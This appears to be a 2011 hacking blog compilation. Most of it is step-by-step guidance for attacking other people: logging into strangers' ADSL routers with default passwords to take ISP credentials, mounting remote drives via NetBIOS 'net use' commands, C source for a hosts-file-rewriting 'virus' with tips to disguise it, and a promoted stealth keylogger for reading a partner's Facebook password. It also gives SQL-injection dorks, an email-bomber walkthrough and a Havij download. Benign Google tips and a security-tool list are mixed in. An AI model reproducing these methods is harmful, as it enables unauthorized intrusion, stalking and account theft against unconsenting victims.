Wednesday 30 November 2011

How to Hack an Ethernet ADSL Router


ADSL-RoutersAlmost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Angry IP Scanner
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
 
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
 
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
IP Scanner
 
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
Router Settings Page
 
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.
 

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.
 

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. 
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

Advanced Google Search

In this post I will show you some of the secrets of Advanced Google Search.
Google is clearly the best general-purpose search engine on the Web. But most people don’t use it to its best advantage or in an advanced way. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number. There are some ways in which advanced Google search can be used to get the desired results.
But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Advanced Google search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of the advanced Google search options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Here are some advanced Google search operators that can help narrow down your search results.
1. Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.
2. Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as
www.gohacking.com/index.html
you can enter intext:html
3. Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in
4. site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature (Google Calculator) lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”
Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search
Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Extended Googling

Google offers several advanced services that give you a head start in focusing your search. Google Groups (Google Groups) indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools:
Froogle CODE (FroogleCODE),
which indexes products from online stores, and Google CatalogsCODE(Google Catlogs),
which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at www.google.com/options/index.html
You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
Google Alert
http://www.googlealert.com
monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts
This advanced Google service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)
Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out).
With Google Voice Search (Google Voice Search), you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.
In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from CODE www.google.com/apis

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
STEP-BY-STEP NETBIOS HACKING PROCEDURE
1.Open command prompt
2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

Cell Phone Lookup: How to Do a Reverse Cell Phone Lookup


Cellphone-Phone-LookupA Reverse Cell Phone Lookup is simply a process of finding someone’s personal details such as name, age, address and related information by using their cell phone number. At times it becomes necessary for us to start investigating on someone to know their personal details. The reason for this can be many – Some people may go for a cell phone lookup in order to locate their old friends, some to investigate the prank calls or to trace a suspicious number.
There exists a lot of websites on the Internet that offer reverse cell phone search, some claim to be free while others ask you a small fee for the subscription. There also exists a few directories that provide access to both landline and cell phone numbers thereby providing an all-in-one lookup service.
Since most people wish to access this information for free, they go in search of those websites which provide the reverse cell phone lookup service for free. Most scam websites take up this tendency of people as an added advantage and try to attract more and more visitors by promising them to provide the search service at a free of cost. In reality, the visitors of these websites may pick up malware programs like viruses and trojans. So you should be very careful not to visit any of such websites unless you are 100% confident about their legitimacy. Hence, in order to do a reverse cell phone lookup, you need to find a trusted website/directory service that provide information which is accurate and authentic.
Even though there is no national cell phone lookup directory available in United States due to various privacy concerns, there are still a number of top quality directories used by various private detectives, journalists and those who are in need to spy on their cheating spouse or children. These companies invest a lot of time and financial resources in gathering mobile phone and landline numbers by using both private and public sources, as well as major cell phone carrier restricted databases.
Thus by using this service it becomes just a cakewalk for anyone to find the details associated with any phone number whether it be a cell phone or a landline. The entire process of finding someone by cellphone number is very straightforward – all you need to do is just enter the phone number that you want to trace down and hit the “Search” button. You will be able to instantly view the information such as the phone owner’s name, age, mobile provider, billing address, previous addresses and more.
I recommend the following cell phone directory to search both mobile & landline and listed/unlisted residential numbers. The site is completely safe and uses a 128-bit secured access to maintain 100% privacy of the uses. All searches remains private and anonymous. Click on the following link to gain access now!

Phone Number Scan

NOTE: This works only for Unites States telephone numbers (landline and Mobile)

Hack Facebook Password – Facebook Hacking

Wondering to know how to hack Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So in this post, we’ll look at some of the possible ways to hack Facebook password!
Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service. However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.
With my experience of over 7 years in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack Facebook password.

Possible Ways to Hack Facebook Password


1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each and every keystroke that is  typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in the invisible mode and start capturing each and every keystroke that was typed on the computer. 
Some keyloggers with advanced features can also capture screenshots and monitor every activity of the computer. One doesn’t need to have any special knowledge in order to install and use a keylogger. That means, anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to Facebook account.
Easily Access any Email
SniperSpy (TESTED) is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail or Hotmail. There are absolutely *NO* limitations to what accounts or websites this software can access!
Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However, there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this, you can install it on a remote computer without the need for having physical access to it. It operates in a complete stealth mode so that it remains undetected.
Here is a summary of benefits that you will receive with Sniperspy software:
1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.
2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
3. Never Get Caught!
SniperSpy operates in a total stealth mode and thus remains undetectable. Therefore you need not have the fear of being traced or getting caught.
4. Remote Installation Feature
With the Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However, it can also be installed on a local computer.
5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
6. Completely Safe to Use
This software is 100% safe to use since it does not collect any personal information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.
So what are you waiting for? If you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!

2. Phishing – The Difficult Way

The other common way to hack passwords or online accounts is via Phishing. This is the most widely used technique by many hackers to gain access to Facebook and other social networking websites. This method will make use of a fake login page (often called as spoofeed webpage) which will exactly resemble the original one. Say for example, a spoofed webpage of Facebook looks exactly same as that of the original page. This page is actually created by the hacker and is hosted on his own server. Once the victim enters his/her password in such a fake login page, the login details are stolen away by the hacker.
Most Internet users would easily fall prey to such online phishing scams. Thus phishing scams trick users in such a way that, they themselves give away their passwords. But phishing requires specialized knowledge and high level skills to implement. Hence it would not be possible for a noob user (perhaps like you) to attempt this trick. It is a punishable offense too. So, I would recommend that you stay away from phishing and make use of the keyloggers to hack Facebook password since it is the easiest and the safest way.

Facebook Hacking Methods that Do Not Work! 


Today, there are hundreds of scam websites out there that are waiting to rip off your pockets by making false promises. These websites claim to be the experts in the field of hacking and boast to instantly obtain any password for you. Most people fall victim to these websites and lose their hard earned money. Thus the idea behind this post is to expose the truth behind hacking the Facebook (or any email password) so that you can learn how to do it for yourself and stay away from all those scam websites. The following are some of the hacking methods that actually do not work:
1. Many scam websites claim to exploit a certain vulnerability of Facebook website as a means to crack the password. Unfortunately, there is no such vulnerability in Facebook (or any other online account) that can be exploited to crack the password. I advise you to stay away from such scam websites.
2. There is no ready-made software program that is available to hack Facebook password except the keylogger (spy software). In fact, keyloggers are pretty generic and meant to record the keystrokes of a computer which obviously includes the password also. Keep in mind that apart from the keylogger, there is no such program that is specifically designed to gain access to Facebook accounts. Stay away from any website that claim to sell such program.
3. Beware! On many websites and Internet forums you will often see fake articles about Facebook hacking. Most of them will tell you something like this: “you need to send an email to passwordretrieve@facebook.com along with your username and password” (or something similar). Never give away your password to anyone nor send it to any email address. If you do so, you will lose your password itself in attempt to hack somebody else’s password.
I hope this post will help you avoid scams and choose the right approach to accomplish your goal.

Wednesday 16 November 2011

What is Havij?
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit
SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can
perform back-end database fingerprint, retrieve DBMS users and password hashes, dump
tables and columns, fetching data from the database, running SQL statements and even
accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The
success rate is more than 95% at injec􀆟ng vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and
detections makes it easy to use for everyone even amateur users.


Who should use Havij?
All security professionals, Web administrators, web application developers, penetration
testers, everyone who wants to test his/her sites security and all hack and security
researchers can use Havij.


Installing Havij
Requirements for installing Havij:
 Windows operating system
 Havij setup file
 Internet Explorer 5.5 or above
 8MB free space on hard disk




download havij and enjoy hacking......

http://www.mediafire.com/?3cvnb4m944ksrjp

Monday 14 November 2011

Logon Warning hack


Have you ever been caught by a virus that shows a warning when you logon in windows,
Yeah i have a long back experience with that virus,
so what that's virus actually did so it can show that warning , well it did nothing then just a bit of code that is also know as Registry Hack.
Well this hack would able you to make such kind of virus so lets go for that :-
Follow these steps :-

1. Click on start menu or you can hit [ Window Key + R ].
2. A Dialog box will open i.e. Run Dialog box.
3. Type in [ Regedit ] and hit enter.
4. This will open Windows Registry Editor.
5. Now form left menu Navigate too
[ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ]
*case sensitive.
6. In right pane, look for key by the name "LegalNoticeCaption".
  **If there isn't there then create a new [ String Value name "LegalNoticeCaption" ].
7. Type in value to whatever text you want to see displayed at login screen.
8. For example :- “Zombies ahead “  , “You have caught a virus. Shut down immediately” , “ you are Hacked “. Just use your Brain.

Now when the victim logons he will see this warning and he will be freaked.
That's when you have successfully hacked the victim.
Isn't it awesome.

Top 100 Security Tools


So, You all guessed it right they are the most wanted ,super cool ,damn cool Software
which each of us must have,
I got this and just wanted to share with guys,
So we can be rocking.

So, Here Goes The List

A:
--
- A² Trojan Scanner -
- http://www.emsisoft.com/en/
----------------------------------------------
- Ad-Aware SE Personal Edition -
----------------------------------------------
- http://www.lavasoft.de/ms/index.htm
-----------------------------------
Add/Remove Pro v. 2.08 -
-----------------------------------
It allows the user to uninstall selected programs or remove broken entries from the Add/Remove Programs list.
Freeware.

http://superwin.com/freeware.htm
Direct Download link: http://superwin.swmirror.com/adrmpro2.exe
----------------------------------------
-AW Ports Traffic Analyzer :
----------------------------------------
- http://www.Atelierweb.com/pta/
- Autostart Explorer -
The most comprehensive autostart viewer available on the market.
It will show you all autostarted files on your system, no matter from where they are started.
http://www.misec.net/freeware/
------------------------------------------
- [DCS] Auto Start Explorer -
------------------------------------------
Autostart Viewer allows you to see every autostart on your system, all on the one screen. In addition, it gives you complete control over the autostart references, and allows you to modify or delete them at will.
http://www.diamondcs.com.au/index.php?page=asviewer
--
B:
--
Belarc Advisor -
http://www.belarc.com/free_download.html
Bhodemon -
http://www.wilders.org/downloads.htm
- BoClean Anti-Trojan Scanner -
- http://www.nsclean.com/boclean.html
--
C:
--
- The Cleaner - Anti-trojan Scanner
- http://www.moosoft.com/
Cookie wall -
http://Analogx.com/
[cookie manager]
Commview:
http://www.tamos.com/products/commview/
http://www.ethernet-analyzer.com/main/12/
Crazybrowser -
http://www.crazybrowser.com/
CWS Shredder
http://www.spywareinfo.com/~merijn/
For the CoolwebSmartsearch try this:
There is a variant of the Coolwebsearch trojan spreading that closes several anti-spyware apps when you try to open them.
If this is happening to you, download PepiMK's CoolWWWSearch.SmartKiller removal tool first and run it.
After it does its job, CWShredder and HijackThis will run properly (as well Spybot S&D, Ad-aware and several anti-spyware forums).
http://www.safer-networking.org/files/delcwssk.zip
--
D:
--
D3traceroute:
DUMETER :
--
E:
--
ERASER- Ultimate Free File wiper
http://www.heidi.ie/eraser/download.php
EWIDO Anti-Trojan SECURITY SUITE
[includes XP ANTI SPY and ERASER ]
http://www.ewido.net/en/?section=ess
--
F:
--
Faber Toys -
www.faberbox.com/fabertoys.asp
FASTNET 99 :
http://w3.quipo.it/gcriaco/
--
G:
--
Greenbrowser 
http://www.morequick.com
--
H:
--
HijackThis :
http://www.merijn.org/files/hijackthis.zip
http://www.spywareinfo.com/~merijn/files/hijackthis.zip
HijackThis Hotkey:
http://hometown.aol.co.uk/jrmc137/HJTHotkey/
HOSTER 1.4
http://www.bluetack.co.uk/forums/index.php?showtopic=2838
HOSTESS :
http://www.bluetack.co.uk/forums/index.php?showtopic=2626
Htastop - http://www.wilders.org/downloads.htm
[protect against hta exploit, or get Regrun for full protection]
--
I:
--
INETWATCH -
free dos program for monitoring all internet connections.
http://www.morpheussoftware.net/inetwatch/inetwatch.html
--
J:
--
--
K:
--
Kaspersky Anti-Virus
Kerio Firewall :
Kerio Personal Firewall
KLITE TOOLS:
http://www.klitetools.com/
--
L:
--
--
M:
--
MicroWorld Free eScan Antivirus Toolkit Utility
http://www.mwti.net/antivirus/free_utilities.asp
Helps you diagnose if your machine is infected by a virus.
This tool also cleans your registry and other system areas of the damage that a virus might have done. The best part of eScan toolkit utility, is its ability to
A. Check running processes in memory.
B. Check illegal dialers running in memory and inform the user.
C. Inform users of any background (legal) sniffers or tools running in memory.
Please click on any one of the links below to down the Free Antivirus Toolkit Utility.
This utility is updated with the latest virus signature databases, once a week.
(Download size = 3.5 MB - 4 MB)
Mru blaster -
http://www.wilderssecurity.com/mrublaster.html
--
N:
--
--
O:
--
Outpost firewall Pro /Free - [10/10]
dont leave home without it -
New Pro Version 4 :
http://www.agnitum.com/
[ultimate firewall protection]
--
P:
--
Microsoft Port Reporter:
Port Reporter logs TCP and UDP port activity on a local Windows system. Port Reporter is a small application that runs as a service on Windows 2000, Windows XP, and Windows Server 2003.
http://support.microsoft.com/default.aspx?...kb;en-us;837243
Process XP [ Explorer ] -
http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
[monitors all running processes, can replace XP task manager, essential for win98systems]
- ProcessGuard -
http://www.diamondcs.com.au/processguard/
More info:
http://www.dslreports.com/forum/remark,11863540~mode=flat
- Proxomitron:
http://www.computercops.biz/modules.php?name=Proxomitron
- Proxyrama:
http://gaamoa.deny.de/]http://gaamoa.deny.de/
http://clan.cyaccess.com/?menusoft&proxyrama
--
Q:
--
http://www.quintessential.org/
cool music prog
--
R:
--
RegProt - http://www.diamondcs.com.au/web/htm/regprot.htm
[protects against registry modification, allow/deny type program]
REGRUN SECURITY SUITE : [10/10]
http://www.greatis.com/
Rootkit Revealer
[ sysinternals ]
---------------------------------
Rootkit Hunter
---------------------------------
http://www.securiteam.com/tools/5LP140ACAE.html
This tool scans for rootkits, backdoors and local exploits by running tests like:
- MD5 hash compare
- Look for default files used by rootkits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files
--
S:
--
ScriptDefender - http://www.analogx.com/contents/download/s...tem/sdefend.htm
[configure to intecept scripts before they run]
Sentinel- http://www.runtimeware.com/?page=p_sentinel2
[protect against trojans and viruses- detect all new files and system changes]
Spywareblaster -
http://www.wilderssecurity.net/spywareblaster.html
http://www.javacoolsoftware.com/sbdownload.html
http://www.net-integration.net/tools/spywareblaster.html
Custom SpywareBlaster Blocklist:
http://customblockinglist.cjb.net/
Spywareguard -
http://www.wilderssecurity.com/spywareguard.html]
[two great tools to stop spyware in its tracks]
System Safety Monitor - [10/10]
http://maxcomputing.narod.ru/ssme.html?lang=en
http://www.snapfiles.com/get/systemsafety.html
[protects against malicious code/dll injection and will allow you to prevent any process from running without your approval, slightly adavanced but worth trying, XP is best ]
System Security Suite:
http://news.webattack.com/get/3s.shtml
--
T:
--
TCPVIEW:[10/10]
- http://www.sysinternals.com/ntw2k/source/tcpview.shtml
- TROJANHUNTER -
- http://www.misec.net/trojanhunter/
--
U:
--
--
V:
--
--
W:
--
--
X:
--
Webwasher:
http://www.webwasher.com/client/home/index.html?lang=de_EN
http://www.inetprivacy.com/a4proxy/webwasher.htm
Winguard Pro - http://www.winguardprofree.com/
[password protect and lock your system down- no rogue cmd.exe will ever be able to run again without your password]
Winpatrol - http://www.winpatrol.com/
[ protects againsts browser home page hijacks, registry changes, trojans , worms and spywrae , cookie removal and process , services monitoring]
Winsonar - http://www.webattack.com/get/winsonar.shtml
[track runing processes and more]
--
X:
--
XP ANTI_SPY:
http://xp-antispy.org/index.php?option=com...ge&Itemid=1
--
Z :
--
Zonealarm Free:
http://www.zonelabs.com/store/content/comp...reeDownload.jsp
############################################################
--------------------------------------------
ANTIVIRUS REMOVAL TOOLS
--------------------------------------------
http://www.kaspersky.com/removaltools
http://www.f-secure.com/download-purchase/tools.shtml
=====================
Winsock Repair Tools
=====================
LSP-Fix
http://cexx.org/lspfix.htm
http://www.bu.edu/pcsc/internetaccess/winsock2fix.html - Winsock repair utility designed for Windows 98, 98SE, and ME.
http://members.shaw.ca/techcd/WinsockXPFix.exe - Winsock repair utility designed for Windows XP.
http://digital-solutions.co.uk/lavasoft/whndnfix.zip - Winsock repair utility for Windows 95/98/98SE/ME.
=====================
Missing System Files:
=====================
http://www.snapfiles.com/help/missingfiles.html
========================
:: Recommended Download Sites ::
========================
- DIAMONDCS.COM.AU Downloads -
http://www.diamondcs.com.au/index.php?page=products
- Nirsoft Downloads -
http://www.nirsoft.net/
- Sysinternals
- http://www.sysinternals.com/ntw2k/utilities.shtml
http://www.excessive-software.tk/
http://www.wilders.org/anti_trojans.htm
http://www.computercops.biz/downloads-cat-6.html
http://www.computercops.biz/downloads.html
http://keir.net/software.html
freeware/downloads
- http://www.spychecker.com/software/freeware_esecurity.html
- http://www.spychecker.com/moresoftware.html
Anti-Spyware program page;
- http://www.majorgeeks.com/showfiles.php?cat=31
Sover.net freeware security:
http://www.sover.net/~wysiwygx/Security1.html
Alternate Browsers:
http://mozilla.org/download.html
- http://www.pricelessware.org/index.htm
- http://www.sover.net/~whoi/Sofffffffware.html
- http://www.webattack.com/
- http://www.all4you.dk/
- http://www.downloads.com/
- http://www.rocketdownload.com/
- aumha.org/freeware.htm

Hope you all love this list,
if you cant remember it,

Spam your friend !!


This is not a new technique, it is also called E-Mail Bombing,zx9s06-w200-h200
Well its pretty awesome if you like it,

Its task is to bomb an E-mail ID or any other means of communication. but you can view its usage in many areas its really cool to hack your friends in minute just for fun.
well this works in major cases but in this posts i am gota be showing you a E-mail bombing software.

Just follow the follow these really simple steps :-
1. Download this E-mail bomber.
Download
2. After downloading Run it.
3. Enter the victims Email address or if you want to hack your friend then enter his email address.
4. The Enter the Subject of the Bombing.
5. Then enter your email address  (only Gmail supported).  [ NOTE : Enter with suffix @gmail.com or it wont work. ]

6. Then enter your email password.
7. Enter the message you want to send to him.
8. Enter the number of messages you want to send to him.
9. Then hit Send.
10. You have successfully bombed your friend. ;)
zx9s06
That was easy.

This is one of a kind of email bomber you saw.bomb-w200-h200
there are many of these hack tools i gotta be discussing later.
if you want to wait you can wait.

google dorks for finding confidential data

IP

Monday, December 27, 2010

Google Dorks for sql injection


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id= 
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
